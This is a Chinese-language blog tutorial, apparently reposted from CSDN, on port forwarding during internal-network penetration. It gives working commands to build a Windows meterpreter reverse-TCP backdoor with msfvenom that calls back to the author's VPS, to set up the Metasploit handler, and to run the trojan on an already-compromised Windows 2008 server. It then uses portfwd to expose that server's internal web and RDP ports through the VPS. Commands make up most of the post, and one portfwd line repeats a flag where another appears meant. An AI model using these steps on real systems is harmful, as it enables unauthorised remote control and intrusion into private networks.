文章目录
前言
在内网渗透过程中,实现端口转发是十分重要的一步。如:我们要进行远程连接,但是它只允许内网主机连接;将内网访问的网站转发出来,实现外网可以访问。要解决这些情况我们都可以通过端口转发来解决,我们可以把内网端口转发到出网的端口上,也可以把端口转发到我们的 VPS主机上。下面以Windows2008服务器为目标服务器 ,以Ubantu为VPS主机。这里为了 方便假设我们已经拿下了服务器的控制权限,同时新建了用户可以远程连接。如有错误的地方,欢迎各位大佬在评论区批评指教。
一、生成MSF后门程序并上线
1、使用 MSF生成payload,让目标主机上线,这里的MSF我是搭建在VPS上的。还有不知道咋个在云服务器上搭建MSF可以参考此链接:云服务搭建MSF环境
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.**.17*.172 lport=12341 -f exe > a1.exe
2、在MSF中设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 101.**.17*.172 #VPS的IP
set lport 12341
run
3、在目标服务器端运行木马程序,发现主机上线,同时也知道了公网IP地址为:222.**.14.3
二、使用portfwd实现端口转发
1、端口转发前测试远程连接和数据库连接是否成功
1、远程连接测试:
win+r 输入:mstsc
输入目标主机的公网IP地址:222.***.14*.3
连接失败
2、网站访问测试,返回无法连接
2、进行端口映射
方法1:
portfwd add -l 101.37.173.172 -l 2020 -p 80 -r 192.168.111.19
通过将内网的80端口转发到VPS上的2020端口,我们就可以直接访问VPS的2020端口就可以访问到内网的80端口,这样进一步寻找内网网站漏洞就更加方便
同理我们来转发内网的3389就端口,实现可以远程访问:
portfwd add -l 101.37.173.172 -l 2021 -p 3389 -r 192.168.111.19
方法2:
这里我就不截图进行证明了,直接写上用法:
转发内网80端口:
portfwd add -l 2022 -p 80 -r 192.168.111.19
转发内网3389端口:
portfwd add -l 2023 -p 3389 -r 192.168.111.19
这样也可以实现端口转发,这个时候我们可以使用一下命令来查看当前建立的端口转发情况和清除建立的端口转发
portfwd list #查看转发表
portfwd flush #清空转发表
总结
端口转发在内网渗透中是非常重要的,还有很多方法可以实现端口转发,后面的方法将会在以后的文章中慢慢更新,里面有错误的地方还请大佬们批评指正,相互进步。
标签:VPS,端口,portfwd,转发,MSF,内网 来源: https://blog.csdn.net/da_chuan_chuan/article/details/122285865
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。